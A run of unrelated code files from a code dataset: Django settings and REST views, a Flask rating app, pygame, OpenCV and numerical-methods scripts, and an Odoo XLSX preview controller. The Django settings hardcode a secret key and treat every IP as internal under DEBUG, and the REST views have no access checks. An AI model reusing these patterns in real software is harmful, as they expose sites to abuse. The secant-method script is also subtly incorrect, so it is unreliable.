user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = os.path.join(settings_dir, 'media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = os.path.join(settings_dir, 'static')\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# URL prefix for admin static files -- CSS, JavaScript and images.\n# Make sure to use a trailing slash.\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nSECRET_KEY = 'u=@fy7qlo@e2ga1xv5=f(d1xx1$6bzj@em(9-5dhu)7as*#^5$'\n\nEMAIL_HOST = 'localhost'\nEMAIL_SUBJECT_PREFIX = '[wlan-si] '\nDEFAULT_FROM_EMAIL = 'open@wlan-si.net'\nSERVER_EMAIL = DEFAULT_FROM_EMAIL\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'cms.context_processors.media',\n 'sekizai.context_processors.sekizai',\n 'mainpage.wlansi.context_processors.global_vars',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'cms.middleware.multilingual.MultilingualURLMiddleware',\n 'wlansi.middleware.ForceAdminLanguage',\n 'cmsplugin_blog.middleware.MultilingualBlogEntriesMiddleware',\n 'cms.middleware.page.CurrentPageMiddleware',\n 'cms.middleware.user.CurrentUserMiddleware',\n 'django.middleware.transaction.TransactionMiddleware',\n)\n\nROOT_URLCONF = 'mainpage.urls'\n\nMESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n# os.path.join(settings_dir, 'templates'),\n)\n\nINSTALLED_APPS = (\n # Here because of the weird import order problems with templates and sekizai\n 'cmsplugin_markup_tracwiki',\n\n # Ours are first so that we can override default templates in other apps\n 'frontend.account',\n 'mainpage.wlansi',\n 'mainpage.wlansi.donations',\n 'mainpage.wlansi.inmedia',\n 'mainpage.wlansi.news',\n\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n 'django.contrib.staticfiles',\n\n 'cms',\n 'mptt',\n 'menus',\n 'south',\n 'easy_thumbnails',\n 'filer',\n 'tagging',\n 'reversion',\n 'sekizai',\n 'djangocms_utils',\n 'simple_translation',\n 'cmsplugin_blog',\n 'cms.plugins.snippet',\n #'cms.plugins.inherit',\n 'cmsplugin_filer_file',\n 'cmsplugin_filer_folder',\n 'cmsplugin_filer_teaser',\n 'cmsplugin_filer_video',\n 'cmsplugin_filer_image',\n 'cmsplugin_markup',\n 'cmsplugin_contact',\n 'missing',\n)\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\nLOGIN_REDIRECT_URL = '/admin/'\nLOGIN_URL = '/admin/'\nLOGOUT_URL = '/admin/'\n\nAUTHENTICATION_BACKENDS = (\n 'frontend.account.auth.ModelBackend',\n 'frontend.account.auth.AprBackend',\n 'frontend.account.auth.CryptBackend',\n)\n\nFORCE_LOWERCASE_TAGS = True\n\nCMS_TEMPLATES = (\n ('simple.html', 'Simple Page'),\n ('simple_with_right.html', 'Simple Page with Right Column'),\n ('main.html', 'Main Page'),\n ('blog.html', 'Blog Page'),\n)\n\n# Not really used as we are not using django-cms core plugins for files but django-filer\n#CMS_PAGE_MEDIA_PATH = 'assets/'\n\nCMS_USE_TINYMCE = False\n\nCMS_MARKUP_OPTIONS = (\n 'cmsplugin_markup_tracwiki',\n)\n\nCMS_MARKUP_TRAC_INTERTRAC = {\n 'grow': {\n 'TITLE': 'wlan slovenia growing',\n 'URL': 'http://grow.wlan-si.net',\n },\n 'interop': {\n 'TITLE': 'Open Networks Interoperability',\n 'URL': 'http://interop.wlan-si.net',\n },\n 'dev': {\n 'TITLE': 'wlan slovenia development',\n 'URL': 'http://dev.wlan-si.net',\n },\n}\n\nCMS_MARKUP_TRAC_INTERWIKI = {\n 'nodes': {\n 'URL': 'https://nodes.wlan-si.net/',\n },\n 'lists': {\n 'URL': 'http://wlan-si.net/lists/arc/$1/$2-$3/msg$4.html',\n },\n 'skypechat': {\n 'URL': 'skype:?chat&blob=',\n },\n 'wikipedia': {\n 'URL': 'http://en.wikipedia.org/wiki/',\n },\n 'slwikipedia': {\n 'URL': 'http://sl.wikipedia.org/wiki/',\n },\n}\n\nCMS_MARKUP_TRAC_CONFIGURATION = {\n 'tracmath': {\n 'cache_dir': os.path.join(settings_dir, 'tracwiki', 'cache'),\n }\n}\n\nCMS_MARKUP_TRAC_TEMPLATES_DIR = os.path.join(settings_dir, 'tracwiki', 'templates')\n\nCMS_MARKUP_TRAC_COMPONENTS = (\n 'tracdashessyntax.plugin.DashesSyntaxPlugin',\n 'footnotemacro.macro.FootNoteMacro',\n 'mathjax.api.MathJaxPlugin',\n 'tracmath.tracmath.TracMathPlugin',\n)\n\nCMS_LANGUAGES_URL_IGNORE_PREFIXES = (\n '/lists',\n)\n\nCMS_URL_OVERWRITE = False\nCMS_MENU_TITLE_OVERWRITE = True\nCMS_REDIRECTS = True\nCMS_FLAT_URLS = True\nCMS_SOFTROOT = False\n\nCMS_PERMISSION = False\nCMS_MODERATOR = False\nCMS_SHOW_START_DATE = True\nCMS_SHOW_END_DATE = True\nCMS_SEO_FIELDS = False\nPLACEHOLDER_FRONTEND_EDITING = False\n\nCMSPLUGIN_BLOG_PLACEHOLDERS = ('on_index_page', 'the_rest')\n\nJQUERY_JS = os.path.join(STATIC_URL, 'wlansi', 'jquery', 'jquery.min.js')\nJQUERY_UI_CSS = os.path.join(STATIC_URL, 'wlansi', 'jquery', 'jquery-ui.min.css')\nJQUERY_UI_JS = os.path.join(STATIC_URL, 'wlansi', 'jquery', 'jquery-ui.min.js')\n\nTHUMBNAIL_DEBUG = False\nTHUMBNAIL_QUALITY = 95\nTHUMBNAIL_PROCESSORS = (\n 'easy_thumbnails.processors.colorspace',\n 'easy_thumbnails.processors.autocrop',\n 'filer.thumbnail_processors.scale_and_crop_with_subject_location',\n 'easy_thumbnails.processors.filters',\n)\n\nVIDEO_WIDTH = 480\nVIDEO_HEIGHT = 360\nVIDEO_FULLSCREEN = False\n\nFILER_PAGINATE_BY = 50\nFILER_SUBJECT_LOCATION_IMAGE_DEBUG = False\nFILER_IS_PUBLIC_DEFAULT = True\nFILER_IMAGE_USE_ICON = True\nFILER_ENABLE_PERMISSIONS = True\n\nFILER_PUBLICMEDIA_ROOT = os.path.join(MEDIA_ROOT, 'files')\nFILER_PUBLICMEDIA_URL = os.path.join(MEDIA_URL, 'files/')\nFILER_PUBLICMEDIA_THUMBNAIL_ROOT = os.path.join(MEDIA_ROOT, 'thumbnails')\nFILER_PUBLICMEDIA_THUMBNAIL_URL = os.path.join(MEDIA_URL, 'thumbnails/')\nFILER_PRIVATEMEDIA_ROOT = os.path.abspath(os.path.join(MEDIA_ROOT, '..', 'smedia', 'files'))\nFILER_PRIVATEMEDIA_URL = '/smedia/files/'\nFILER_PRIVATEMEDIA_THUMBNAIL_ROOT = os.path.abspath(os.path.join(MEDIA_ROOT, '..', 'smedia', 'thumbnails'))\nFILER_PRIVATEMEDIA_THUMBNAIL_URL = '/smedia/thumbnails/'\n\nclass AllIPs(list):\n def __contains__(self, ip):\n return True\n\nif DEBUG:\n # So that headers and template contexts are populated with debug data\n INTERNAL_IPS = AllIPs()\n\nfrom filer.storage import PublicFileSystemStorage, PrivateFileSystemStorage\n\nFILER_PUBLICMEDIA_STORAGE = PublicFileSystemStorage(\n location=FILER_PUBLICMEDIA_ROOT,\n base_url=FILER_PUBLICMEDIA_URL\n)\nFILER_PUBLICMEDIA_THUMBNAIL_STORAGE = PublicFileSystemStorage(\n location=FILER_PUBLICMEDIA_THUMBNAIL_ROOT,\n base_url=FILER_PUBLICMEDIA_THUMBNAIL_URL\n)\nFILER_PRIVATEMEDIA_STORAGE = PrivateFileSystemStorage(\n location=FILER_PRIVATEMEDIA_ROOT,\n base_url=FILER_PRIVATEMEDIA_URL\n)\nFILER_PRIVATEMEDIA_THUMBNAIL_STORAGE = PrivateFileSystemStorage(\n location=FILER_PRIVATEMEDIA_THUMBNAIL_ROOT,\n base_url=FILER_PRIVATEMEDIA_THUMBNAIL_URL\n)\n\nCMSPLUGIN_FILER_FOLDER_VIEW_OPTIONS = (\n ('slideshow', 'Slideshow'),\n ('list', 'List'),\n)\n\nSUPPORTERS_FILER_FOLDER_NAME = 'Supporters'\n","sub_path":"mainpage/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":12910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"260042229","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom .serializers import NodeSerializer, HistorySerializer, TeamSerializer, ProfileSerializer, CommentSerializer, ProfileInfoSerializer, BaseCommentSerializer, ImageSerializer, UserSerializer, TeamHistorySerializer, TeamMembersSerializer\nfrom .models import Node, Team, Profile, Comment, Image\nfrom rest_framework import generics, permissions\nfrom rest_framework.response import Response\nfrom knox.models import AuthToken\nfrom .serializers import RegisterSerializer\nfrom django.contrib.auth.models import User\nfrom rest_framework import status\n\nfrom django.contrib.auth import login\n\nfrom rest_framework import permissions\nfrom rest_framework.authtoken.serializers import AuthTokenSerializer\nfrom knox.views import LoginView as KnoxLoginView\nfrom rest_framework.decorators import action\n\n\nclass NodeView(viewsets.ModelViewSet):\n serializer_class = NodeSerializer\n queryset = Node.objects.filter(parent=None)\n\n\nclass AllNodesView(viewsets.ModelViewSet):\n # this view should probably be the same as NodeView at somepoint\n serializer_class = NodeSerializer\n queryset = Node.objects.all()\n\n @action(detail=True, methods=['get'])\n def comments(self, request, pk=None):\n node = self.get_object()\n comments = node.comments.all()\n return Response(CommentSerializer(comments, many=True).data)\n\n @action(detail=True, methods=['get'])\n def images(self, request, pk=None):\n node = self.get_object()\n images = node.images.all()\n return Response(ImageSerializer(images, many=True).data)\n\n\nclass TeamsView(viewsets.ModelViewSet):\n # this view should probably be the same as NodeView at somepoint\n serializer_class = TeamSerializer\n queryset = Team.objects.all()\n\n @ action(detail=True, methods=['get'], serializer_class=NodeSerializer)\n def nodes(self, request, pk=None):\n \"\"\"\n Returns a list of all the nodes that the given\n team owns.\n \"\"\"\n # print(request.data)\n team = self.get_object()\n nodes = team.nodes.all()\n return Response(nodes.values())\n\n @ action(detail=True, methods=['post'])\n def update_nodes(self, request, pk=None):\n \"\"\"\n Updates the list of all the nodes that the given\n team owns.\n \"\"\"\n # print(request.data)\n node = Node.objects.get(id=request.data['id'])\n team = self.get_object()\n team.nodes.add(node)\n team.save()\n nodes = team.nodes.all()\n return Response(nodes.values())\n\n\nclass ProfilesView(viewsets.ModelViewSet):\n # this view should probably be the same as NodeView at somepoint\n serializer_class = ProfileSerializer\n queryset = Profile.objects.all()\n\n @ action(detail=True, methods=['put'])\n def join_team(self, request, pk=None):\n \"\"\"\n joins a team that the given profile requests\n \"\"\"\n # print(request.data)\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n team = Team.objects.get(unique_key=request.data['unique_key'])\n pfile = self.get_object()\n # maybe check that the user is already on this team before adding\n pfile.teams.add(team)\n profile = pfile.save()\n return Response(ProfileSerializer(profile, context=self.get_serializer_context()).data)\n\n @ action(detail=True, methods=['put'])\n def leave_team(self, request, pk=None):\n \"\"\"\n leaves a team that the given profile is subscribed to\n \"\"\"\n # print(request.data)\n team = Team.objects.get(id=request.data['id'])\n profile = self.get_object()\n profile.teams.remove(team)\n profile.save()\n teams = profile.teams.all()\n return Response(teams.values())\n\n @ action(detail=True, methods=['get'])\n def view_teams(self, request, pk=None):\n \"\"\"\n views the teams the given user is subscribed to\n \"\"\"\n # print(request.data)\n profile = self.get_object()\n teams = profile.teams.all()\n res = []\n for team in teams:\n # print(Profile.objects.filter(\n # teams=team).prefetch_related('username').values())\n # profs = Profile.objects.filter(teams=team).values()\n # for prof in profs:\n # print(ProfileSerializer(\n # prof, context=self.get_serializer_context()).data)\n data = {\"id\": team.id, \"name\": team.name, \"description\": team.description, \"unique_key\": team.unique_key, \"members\": list(\n Profile.objects.filter(teams=team).values())}\n res.append(data)\n # print(res)\n return Response(res)\n\n\nclass CommentsView(viewsets.ModelViewSet):\n serializer_class = CommentSerializer\n queryset = Comment.objects.all()\n\n\nclass BaseCommentsView(viewsets.ModelViewSet):\n serializer_class = BaseCommentSerializer\n queryset = Comment.objects.all()\n\n\nclass ImagesView(viewsets.ModelViewSet):\n serializer_class = ImageSerializer\n queryset = Image.objects.all()\n\n\nclass UserView(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n http_method_names = ['get']\n\n\nclass UserExists(APIView):\n \"\"\"\n List all snippets, or create a new snippet.\n \"\"\"\n\n def get(self, request, format=None, *args, **kwargs):\n if User.objects.filter(username=self.kwargs['username']).exists():\n return Response({'exists': True})\n # serializer = UserSerializer(user, many=True)\n return Response({'exists': False})\n\n\nclass HistoryView(viewsets.ModelViewSet):\n serializer_class = HistorySerializer\n queryset = Node.objects.all()\n\n\nclass TeamHistoryView(viewsets.ModelViewSet):\n serializer_class = TeamHistorySerializer\n queryset = Team.objects.all()\n# Register API\n\n\nclass RegisterAPI(generics.GenericAPIView):\n serializer_class = RegisterSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.save()\n return Response({\n \"user\": ProfileSerializer(user, context=self.get_serializer_context()).data,\n \"token\": AuthToken.objects.create(user)[1]\n })\n\n\nclass LoginAPI(KnoxLoginView):\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, format=None):\n serializer = AuthTokenSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n u = Profile.objects.filter(user=user)\n profile = u.values('id').first()\n user_id = user.id\n login(request, user)\n res = super(LoginAPI, self).post(request, format=None)\n res.data['user_id'] = user_id\n res.data['profile_id'] = profile['id']\n\n return Response(res.data)\n # return super(LoginAPI, self).post(request, format=None)\n","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"582222940","text":"import pygame\nimport cloud\nimport mountain\n\nclass Sky:\n\n\tdef __init__(self, x, y, width, height, color):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.skyHeight = self.height//3 * 2\n\t\tself.color = color\n\t\tself.mCloud = cloud.Cloud(width, height, 10)\n\t\tself.sunColor = (255, 255, 0)\n\t\tself.mountainColor = (59, 47, 71)\n\t\tself.mMountainList = [\n\t\t\tmountain.Mountain([[0, self.skyHeight], [100, self.height//3], [200, self.skyHeight]], 0, self.mountainColor),\n\t\t\tmountain.Mountain([[150, self.skyHeight], [250, self.height//2], [350, self.skyHeight]], 0, self.mountainColor),\n\t\t]\n\n\tdef draw(self, surface):\n\t\trect = pygame.Rect(0, 0, self.width, self.skyHeight)\n\t\tpygame.draw.rect(surface, self.color, rect)\n\t\tpygame.draw.circle(surface, self.sunColor, (self.width - 100, 100), 30, 0)\n\t\tself.mCloud.draw(surface)\n\n\t\tfor m in self.mMountainList:\n\t\t\tm.draw(surface)","sub_path":"pygame-starter-lean/sky.py","file_name":"sky.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"341833","text":"def main():\n n = int(input())\n ss = [list(input()) for _ in range(n)]\n\n ss_set = sorted(list(set(ss[0])))\n ans = ''\n\n for ch in ss_set:\n cnt = min(ss[i].count(ch) for i in range(n))\n ans += ch * cnt\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python_codes/p03761/s905895112.py","file_name":"s905895112.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"533110268","text":"import cv2\nimport numpy as np\n\n#Lendo a imagem\nimg = cv2.imread(\"pet.jpg\")\n\n#Aplicando os filtros\nfiltro1 = np.array([[0,1,0],[1,1,1],[0,1,0]])/5\nmedia1 = cv2.filter2D(img, -1, filtro1)\n\nfiltro2 = np.array([[1,1,1],[1,1,1],[1,1,1]])/9\nmedia2 = cv2.filter2D(img, -1, filtro2)\n\nfiltro3 = np.array([[1,1,1],[1,2,1],[1,1,1]])/10\nmedia3 = cv2.filter2D(img, -1, filtro3)\n\nfiltro4 = np.array([[1,2,1],[2,4,2],[1,2,1]])/12\nmedia4 = cv2.filter2D(img, -1, filtro4)\n\n#Exibir as Imagens\ncv2.imshow(\"Imagem original\", img)\ncv2.imshow(\"Media do F1 3x3\", media1)\ncv2.imshow(\"Media do F2 3x3\", media2)\ncv2.imshow(\"Media do F3 3x3\", media3)\ncv2.imshow(\"Media do F4 3x3\", media4)\ncv2.waitKey()\n","sub_path":"Lista_de_Exercicios/atividade6.py","file_name":"atividade6.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"237670155","text":"from math import *\ndef func(x):\n return x*x*x-4*x+4\n # return x*x*x*x-x-10\n # return x*exp(x)-cos(x*180/(pi))\n\ndef secant_method(x0,x1):\n # while True:\n while True:\n x2 = x1 - (func(x1) *(x1 - x0)) / (func(x1) - func(x0))\n errConvergence=(x2-x1)/x1\n if func(x2)>0:\n x1=x2\n elif func(x2)==0:\n print(x2)\n print(errConvergence)\n break\n else:\n x0=x2\n\nx0=float(input(\"enter a number\"))\nx1=float(input(\"enter another number\"))\nsecant_method(x0,x1)\n","sub_path":"secant_method.py","file_name":"secant_method.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"423423884","text":"# -*- coding: utf-8 -*\n# Typical usage scenario:\n# Request main page(get session id) -> Provide user id to parse friends from ->\n# Request voting page -> Vote -> Request voting page ->...\n\n# Url map:\n# /\n# /api/vote/\t\t(parameters: id_voted)\n# /api/rating/\t\t(parameters: lower_rank, higher_rank) \n# /api/get_random_pair/\n# /vote/left/\t\tDEPRECATED\n# /vote/right/\t\tDEPRECATED\n\nfrom flask import Flask, render_template, \\\n\tjsonify, request, make_response, redirect, \\\n\turl_for, g, json\nfrom db import Db\nfrom vk import VK\nfrom credentials import dbCredentials\n\napp = Flask(__name__)\ndb = Db(**dbCredentials)\n\n@app.before_request\ndef dbConnect():\n\tdb.connect()\n\tg.db = db\n\n@app.teardown_request\ndef dbCleanup(exception):\n\tdb = getattr(g, 'db', None)\n\tif db is not None:\n\t\tdb.disconnect()\n\ndef parseVkId(str):\n\tparsedId = None\n\t# Try parsing without regexps for the sake of speed and simplicity\n\tif str is None or len(str) == 0:\n\t\traise ValueError('Cannot parse vk id from {}'.format(str))\n\tindx = str.find('vk.com/')\n\tif indx < 0:\n\t\t# Maybe we got an already parsed vk_id?\n\t\ttry:\n\t\t\tparsedId = int(str)\n\t\texcept ValueError:\n\t\t\t# Nope, we didnt. Report error\n\t\t\traise ValueError('Cannot parse vk id from {}'.format(str))\n\telse:\n\t\tindx += len('vk.com/')\n\t\tparsedId = str[indx:]\n\t\n\t# Now we need to make sure that user with such id exists\n\tid = VK.getIdByShortName(parsedId)\n\treturn id\n\nclass Girl:\n\tdef __init__(self, id, pic):\n\t\tself.pic = pic\n\t\tself.id = id\n\n\n\nclass GirlPair:\n\tdef __init__(self, girl1, girl2):\n\t\tself.girl1 = girl1\n\t\tself.girl2 = girl2\n\t\t\n\t@staticmethod\n\tdef getRandomPair(session_id, db):\n\t\tid = db.getRandomIdPairForSession(session_id)\n\t\t#get pics from vk by returned ids\n\t\tpic = (VK.getPicUrlById(id[0]), VK.getPicUrlById(id[1]))\n\t\tgirls = (Girl(id[0], pic[0]), Girl(id[1], pic[1]))\n\t\treturn girls\n\n\n# web-interface method\n@app.route(\"/\")\ndef getMain():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\t\n\tvkIdRaw = request.args.get('vk_id')\n\t\n\tif vkIdRaw is None and vkIdStored is None:\n\t\t# No vk_id has been provided yet. Wait for it\n\t\tresp = make_response(render_template('index.html'))\n\t\tresp.set_cookie('session_id', str(sessionId))\n\t\treturn resp\n\t\n\tvkId = None\n\ttry:\n\t\tvkId = parseVkId(vkIdRaw)\n\t\tvkId = VK.getIdByShortName(vkId)\n\texcept ValueError:\n\t\tif vkIdStored is None:\n\t\t\treturn redirect(url_for('getMain'))\n\t\n\tif vkId is None and vkIdStored is not None:\n\t\tvkId = vkIdStored\n\telif vkId != vkIdStored:\n\t\tdb.cleanupUsersForSession(sessionId)\n\t\tdb.updateStoredVkIdForSession(sessionId, vkId)\n\t\n\t# На этом этапе мы уже знаем, что ид у нас есть, но мы не знаем,\n\t# грузили ли мы уже его подруг или нет. Надо проверить\n\t\n\tif db.areFriendsLoaded(sessionId) == False:\n\t\tfriends = VK.getFriendsIds(vkId)\n\t\tdb.cleanupUsersForSession(sessionId)\n\t\tdb.storeUsersForSession(sessionId, friends)\n\t\n\t# Теперь мы уверены, что инфа по подругам в базе. Достаем рандомную\n\t# пару и грузим ссылки на их аватарки из вконтакта\n\tgirl1, girl2 = GirlPair.getRandomPair(sessionId, db)\n\t# Апдейтим запись в сессии новыми айдишниками девочек\n\tdb.updateStoredGirlsForSession(sessionId, girl1.id, girl2.id)\n\t\n\t# Теперь у нас есть фотки девочек. Рендерим шаблон главной,\n\t# вставляем в него фотки и отдаем\n\tresp = make_response(render_template('index.html',\\\n\t\tvk_id=vkId, girl1=girl1, girl2=girl2))\n\tresp.set_cookie('session_id', str(sessionId))\n\treturn resp\n\n# Vote for left girl and redirect to index\n@app.route(\"/vote/left/\")\ndef voteLeft():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\n\tif girlLeftStored is not None and girlRightStored is not None:\n\t\tdb.storeChosenGirl(girlLeftStored, girlRightStored)\n\t\t\n\treturn redirect(url_for('getMain'))\n\n@app.route(\"/vote/right/\")\ndef voteRight():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\tif girlLeftStored is not None and girlRightStored is not None:\n\t\tdb.storeChosenGirl(girlRightStored, girlLeftStored)\n\t\t\n\treturn redirect(url_for('getMain'))\n\n@app.route(\"/vote/skip/\")\ndef voteSkip():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\t\n\treturn redirect(url_for('getMain'))\n\n#api method\n@app.route(\"/api/get_random_pair\", methods=['GET'])\ndef getGirlPair():\n\tdb = getattr(g, 'db', None)\n\t#!! TODO: add error processing here\n\trandomPair = GirlPair.getRandomPair(db)\n\treturn json(randomPair)\n\n@app.route(\"/api/vote/\", methods=['GET'])\ndef vote():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\t\n\ttry:\n\t\tidVoted = int(request.args.get('id_voted'))\n\texcept (TypeError):\n\t\treturn json.jsonify(\n\t\t\terror=True,\n\t\t\terror_description='Cannot resolve vk_id'\n\t\t)\n\tidNonVoted = set((girlLeftStored, girlRightStored)) - set((idVoted,))\n\t\n\tif girlLeftStored is not None and girlRightStored is not None:\n\t\tdb.storeChosenGirl(girlBetterId=idVoted, girlWorseId=idNonVoted)\n\t\treturn json.jsonify(\n\t\t\tid_voted=idVoted,\n\t\t\tid_non_voted=idNonVoted\n\t\t)\n\n@app.route(\"/api/rating/\", methods=['GET'])\ndef getRatingApi():\n\tdb = getattr(g, 'db', None)\n\ttry:\n\t\tlowerRank = int(request.args.get('lower_rank'))\n\t\thigherRank = int(request.args.get('higher_rank'))\n\t\tassert lowerRank <= higherRank\n\t\tassert lowerRank >= 0\n\t\tassert higherRank - lowerRank < 100\n\texcept (TypeError, AssertionError):\n\t\treturn json.jsonify(\n\t\t\tranks=[],\n\t\t\terror=True,\n\t\t\terror_description='Invalid parameters for request'\n\t\t)\n\treturn json.jsonify(ranks=db.getRating(lowerRank, higherRank))\n\t\n\ndef getSessionParams(db):\n\tsessionId = request.cookies.get('session_id')\n\tif sessionId is None:\n\t\t#no session id found. Start new session\n\t\tsessionId = db.createSession()\n\t# Check if such session id is in db\n\tsessionIdStored, vkIdStored, girlLeftStored, girlRightStored = \\\n\t\tdb.getSessionParams(sessionId)\n\tif sessionIdStored is None:\n\t\tsessionId = db.createSession()\n\treturn (sessionId, vkIdStored, girlLeftStored, girlRightStored)\n\nif __name__ == '__main__':\n\tapp.run()\n","sub_path":"yabivdul.py","file_name":"yabivdul.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"504143534","text":"# -*- coding: utf-8 -*-\nfrom odoo import http, _\nimport tempfile, os\nfrom odoo.addons.web.controllers.main import serialize_exception,content_disposition\nimport base64\n\ntry:\n import openpyxl\n from xlsx2html.core import worksheet_to_data,render_data_to_html\nexcept:\n pass\n\n\nclass PreviewXlsxReport(http.Controller):\n @http.route(\n ['/preview-xlsx-report//'],\n auth='user', website=True)\n def main_report(self, file_name, report_name, **kw):\n file_path = os.path.join(tempfile.gettempdir(), file_name)\n\n sheets = []\n wb = openpyxl.load_workbook(file_path, data_only=True)\n\n for sheet_name in wb.get_sheet_names():\n ws = wb[sheet_name]\n data = worksheet_to_data(ws, locale='ru')\n html = render_data_to_html(data)\n sheets.append(\n {\n 'html': html,\n 'name': sheet_name\n }\n )\n\n datas = {\n 'sheets': sheets,\n 'title': '',\n 'file_name': file_name,\n 'report_name': _(report_name) + '.xlsx',\n }\n\n return http.request.render(\n 'preview_xlsx_report.preview_xlsx_report_template',\n datas)\n\n @http.route(\n ['/download-xlsx-report//'],\n auth='user', website=True)\n def download_xlsx_report(self, file_name, report_name, **kw):\n file_path = os.path.join(tempfile.gettempdir(), file_name)\n xlsx_file = open(file_path, \"rb\")\n filecontent = base64.b64encode(xlsx_file.read())\n\n content_disposition = http.content_disposition(report_name)\n\n headers = [('Content-Type', u'application/javascript'),\n ('X-Content-Type-Options', 'nosniff'),\n ('ETag', '\"56d3b71b5852986e17f6edca970a84d6\"'),\n ('Cache-Control', 'max-age=0'),\n ('Content-Disposition',\n content_disposition\n )]\n\n content_base64 = base64.b64decode(filecontent)\n headers.append(('Content-Length', len(content_base64)))\n\n response = http.request.make_response(content_base64, headers)\n return response\n","sub_path":"ERP_IN/addons/preview_xlsx_report/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"428956011","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Sookplace\nfrom .forms import SookplaceForm\nfrom django.contrib.auth.models import User\n\n\n\n# Create your views here.\n#게시물 리스트\ndef sookplace_list(request):\n sookplaces = Sookplace.objects \n return render(request, 'sookplaceapp/sookplace_list.html', {'sookplaces' : sookplaces})\n\n\n#게시물 상세페이지 (R)\ndef sookplace_detail(request, sookplace_id):\n sookplace = get_object_or_404(Sookplace, pk=sookplace_id)\n return render(request, 'sookplaceapp/sookplace_detail.html', 